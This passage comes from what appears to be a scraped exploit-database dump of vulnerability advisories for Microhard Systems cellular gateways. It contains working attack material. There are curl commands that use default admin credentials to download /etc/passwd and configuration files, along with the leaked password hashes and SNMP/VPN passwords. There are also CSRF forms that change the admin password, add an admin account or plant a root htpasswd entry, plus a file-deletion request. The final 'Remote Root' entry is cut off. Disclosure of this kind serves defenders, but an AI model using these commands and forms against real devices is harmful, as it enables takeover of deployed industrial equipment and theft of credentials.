802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: Due to the hidden and undocumented File Editor (Filesystem Browser) shell script\r\n'system-editor.sh' an attacker can leverage this issue to read, modify or delete arbitrary\r\nfiles on the system. Input passed thru the 'path' and 'savefile', 'edit' and 'delfile' GET\r\nand POST parameters is not properly sanitized before being used to modify files. This can\r\nbe exploited by an authenticated attacker to read or modify arbitrary files on the affected\r\nsystem.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5485\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5485.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\nDownload (script):\r\n------------------\r\n# curl \"http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc&savefile=passwd\" -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\nroot:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash\r\nadmin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh\r\nupgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false\r\nat:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI\r\nnobody:*:65534:65534:nobody:/var:/bin/false\r\ntestlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh\r\ntestingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false\r\nmsshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh\r\n \r\n \r\nEdit (edit):\r\n------------\r\nCSRF add roOt:rewt to htpasswd:\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-editor.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"path\" value=\"/etc\" />\r\n <input type=\"hidden\" name=\"edit\" value=\"htpasswd\" />\r\n <input type=\"hidden\" name=\"filecontent\" value=\"root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/\r\nadmin:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1\r\nat:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/\r\ntestlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0\r\nroOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0\" />\r\n <input type=\"hidden\" name=\"save\" value=\"\u00c2 Save Changes\u00c2 \" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n \r\nDelete (delfile):\r\n-----------------\r\n \r\nGET /cgi-bin/webif/system-editor.sh?path=/www&delfile=pwn.txt HTTP/1.1\r\n \r\n \r\nOr edit and remove sanitization:\r\nFile: /usr/lib/webif/sanitize.awk\r\n \r\n// { _str=$0;\r\n gsub(/ /,\"\",_str)\r\n gsub(/\\|/,\"\",_str)\r\n gsub(/\\\\/,\"\",_str)\r\n gsub(/&/,\"\",_str)\r\n gsub(/\\^/,\"\",_str)\r\n gsub(/\\$/,\"\",_str)\r\n gsub(/'/,\"\",_str)\r\n gsub(/\"/,\"\",_str)\r\n gsub(/`/,\"\",_str)\r\n gsub(/\\{/,\"\",_str)\r\n gsub(/\\}/,\"\",_str)\r\n gsub(/\$/,\"\",_str)\r\n gsub(/\$/,\"\",_str)\r\n gsub(/;/,\"\",_str)\r\n print _str\r\n}\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30739"}, {"lastseen": "2018-07-17T20:05:49", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30738", "href": "https://0day.today/exploit/description/30738", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The system backup configuration file 'IPn4G.config' in '/' directory or its respective\r\nname based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp'\r\nand the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain\r\ncircumstances. This will enable the attacker to disclose sensitive information and help her\r\nin authentication bypass, privilege escalation and/or full system access.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5484\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\n/etc/m_cli/cli.conf:\r\n--------------------\r\n \r\ncurl \"http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc/m_cli&savefile=cli.conf\" -H \"Authorization: Basic YWRtaW46YWRtaW4=\" |grep passwd\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 2719 100 2719 0 0 2574 0 0:00:01 0:00:01 --:--:-- 2577\r\npasswd admin \r\n \r\n \r\n/www/IPn4G.config:\r\n------------------\r\n \r\n[email\u00a0protected]:~$ curl http://192.168.1.1/IPn4G.config -o IPn4G.tar.gz -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 13156 100 13156 0 0 9510 0 0:00:01 0:00:01 --:--:-- 9512\r\n[email\u00a0protected]:~$ tar -zxf IPn4G.tar.gz ; ls\r\nconfig.boardinfo config.boardtype config.date config.name etc IPn4G.tar.gz usr\r\n[email\u00a0protected]:~$ cat config.boardinfo config.boardtype config.date config.name \r\n2012 Microhard Systems Inc.:IPn4Gb-IPn4G:v1.0.0\r\nAtheros AR7130 rev 2\r\nThu Jul 12 12:42:42 PDT 2018\r\nIPn4G\r\n[email\u00a0protected]:~$ cat usr/lib/hardware_desc \r\nmodem_type=\"N930\"\r\nLTE_ATCOMMAND_PORT=\"/dev/ttyACM0\"\r\nLTE_DIAG_PORT=\"\"\r\nLTE_GPS_PORT=\"\"\r\nwificard = \"0\"\r\n[email\u00a0protected]:~$ ls etc/\r\nconfig crontabs dropbear ethers firewall.user hosts httpd.conf passwd ssl\r\n[email\u00a0protected]:~$ ls etc/config/\r\ncomport dhcp gpsgatetr iperf modbusd notes sdpServer twatchdog webif_access_control\r\ncomport2 dropbear gpsr ipsec msmscomd ntpclient snmpd updatedd websockserver\r\ncoova-chilli ethernet gpsrecorderd keepalive msshc ntrd snmpd.conf vlan wireless\r\ncron eurd gre-tunnels localmonitor network pimd system vnstat wsclient\r\ncrontabs firewall httpd lte network_IPnVTn3G ping timezone vpnc\r\ndatausemonitor gpsd ioports lte362 network_VIP4G salertd tmpstatus webif\r\n[email\u00a0protected]:~$ cat etc/passwd \r\nroot:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash\r\nadmin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh\r\nupgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false\r\nat:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI\r\nnobody:*:65534:65534:nobody:/var:/bin/false\r\ntestlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh\r\ntestingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false\r\nmsshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh\r\n \r\n \r\n/www/cgi-bin/system.conf:\r\n-------------------------\r\n \r\n[email\u00a0protected]:~$ curl -O http://192.168.1.1/cgi-bin/system.conf -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\n[email\u00a0protected]:~$ cat system.conf |grep -irnH \"password\" -A2\r\nsystem.conf:236:#VPN Admin Password:\r\nsystem.conf-237-NetWork_IP_VPN_Passwd=admin\r\nsystem.conf-238-\r\n--\r\nsystem.conf:309:#V3 Authentication Password:\r\nsystem.conf:310:NetWork_SNMP_V3_Auth_Password=00000000\r\nsystem.conf-311-\r\nsystem.conf:312:#V3 Privacy Password:\r\nsystem.conf:313:NetWork_SNMP_V3_Privacy_Password=00000000\r\n \r\n \r\nLogin to FTP (upgrade:admin). In /tmp/ or /tmp/upgrade/ the system.conf (gzipped) is located.\r\n---------------------------------------------------------------------------------------------\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30738"}, {"lastseen": "2018-07-17T20:05:44", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30736", "href": "https://0day.today/exploit/description/30736", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery Vulnerabil", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The application interface allows users to perform certain actions via HTTP requests\r\nwithout performing any validity checks to verify the requests. This can be exploited to\r\nperform certain actions with administrative privileges if a logged-in user visits a malicious\r\nweb site.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5478\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5478.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\nCSRF Change Admin password:\r\n---------------------------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-acl.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"submit\" value=\"1\" />\r\n <input type=\"hidden\" name=\"pw1\" value=\"nimda\" />\r\n <input type=\"hidden\" name=\"pw2\" value=\"nimda\" />\r\n <input type=\"hidden\" name=\"passwdchange\" value=\" Change Passwd \" />\r\n <input type=\"hidden\" name=\"user_add\" value=\"\" />\r\n <input type=\"hidden\" name=\"password_add\" value=\"\" />\r\n <input type=\"hidden\" name=\"password2_add\" value=\"\" />\r\n <input type=\"hidden\" name=\"Carrier_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_Status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_Settings\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_Keepalive\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_TrafficWatchdog\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_DynamicDNS\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_SMSConfig\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_SMS\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Carrier_DataUsage\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Comport_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Comport_Status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Comport_Com0\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Comport_Com1\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_Status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_General\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_Rules\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_PortForwarding\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_MACIPList\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Firewall_Reset\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_Location\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_Settings\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_Report\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_GpsGate\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_Recorder\" value=\"0\" />\r\n <input type=\"hidden\" name=\"GPS_LoadRecord\" value=\"0\" />\r\n <input type=\"hidden\" name=\"I/O_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"I/O_Status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"I/O_OUTPUT\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_Status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_LAN\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_Routes\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_GRE\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_PIMSM\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_SNMP\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_sdpServer\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_LocalMonitor\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Network_Port\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_Settings\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_AccessControl\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_Services\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_Maintenance\" value=\"0\" />\r\n <input type=\"hidden\" name=\"System_Reboot\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_Discovery\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_NetflowReport\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_NMSSettings\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_EventReport\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_Modbus\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_Websocket\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_SiteSurvey\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_Ping\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_TraceRoute\" value=\"0\" />\r\n <input type=\"hidden\" name=\"Tools_NetworkTraffic\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_enable\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_Summary\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_GatewayToGateway\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_ClientToGateway\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_VPNClientAccess\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_CertificateManagement\" value=\"0\" />\r\n <input type=\"hidden\" name=\"VPN_CiscoEasyVPNClient\" value=\"0\" />\r\n <input type=\"submit\" value=\"Change\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n \r\nCSRF Add Admin:\r\n---------------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-acl.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"submit\" value=\"1\" />\r\n <input type=\"hidden\" name=\"pw1\" value=\"\" />\r\n <input type=\"hidden\" name=\"pw2\" value=\"\" />\r\n <input type=\"hidden\" name=\"user_add\" value=\"testingus\" />\r\n <input type=\"hidden\" name=\"password_add\" value=\"123456\" />\r\n <input type=\"hidden\" name=\"password2_add\" value=\"123456\" />\r\n <input type=\"hidden\" name=\"Carrier_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_Status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_Settings\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_Keepalive\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_TrafficWatchdog\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_DynamicDNS\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_SMSConfig\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_SMS\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Carrier_DataUsage\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Comport_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Comport_Status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Comport_Com0\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Comport_Com1\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_Status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_General\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_Rules\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_PortForwarding\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_MACIPList\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Firewall_Reset\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_Location\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_Settings\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_Report\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_GpsGate\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_Recorder\" value=\"1\" />\r\n <input type=\"hidden\" name=\"GPS_LoadRecord\" value=\"1\" />\r\n <input type=\"hidden\" name=\"I/O_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"I/O_Status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"I/O_OUTPUT\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_Status\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_LAN\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_Routes\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_GRE\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_PIMSM\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_SNMP\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_sdpServer\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_LocalMonitor\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Network_Port\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_Settings\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_AccessControl\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_Services\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_Maintenance\" value=\"1\" />\r\n <input type=\"hidden\" name=\"System_Reboot\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_Discovery\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_NetflowReport\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_NMSSettings\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_EventReport\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_Modbus\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_Websocket\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_SiteSurvey\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_Ping\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_TraceRoute\" value=\"1\" />\r\n <input type=\"hidden\" name=\"Tools_NetworkTraffic\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_enable\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_Summary\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_GatewayToGateway\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_ClientToGateway\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_VPNClientAccess\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_CertificateManagement\" value=\"1\" />\r\n <input type=\"hidden\" name=\"VPN_CiscoEasyVPNClient\" value=\"1\" />\r\n <input type=\"hidden\" name=\"mhadd_user\" value=\"Add User\" />\r\n <input type=\"submit\" value=\"Request\" />\r\n </form>\r\n </body>\r\n</html>\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30736"}, {"lastseen": "2018-07-17T20:06:00", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30740", "href": "https://0day.today/exploit/description/30740", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data 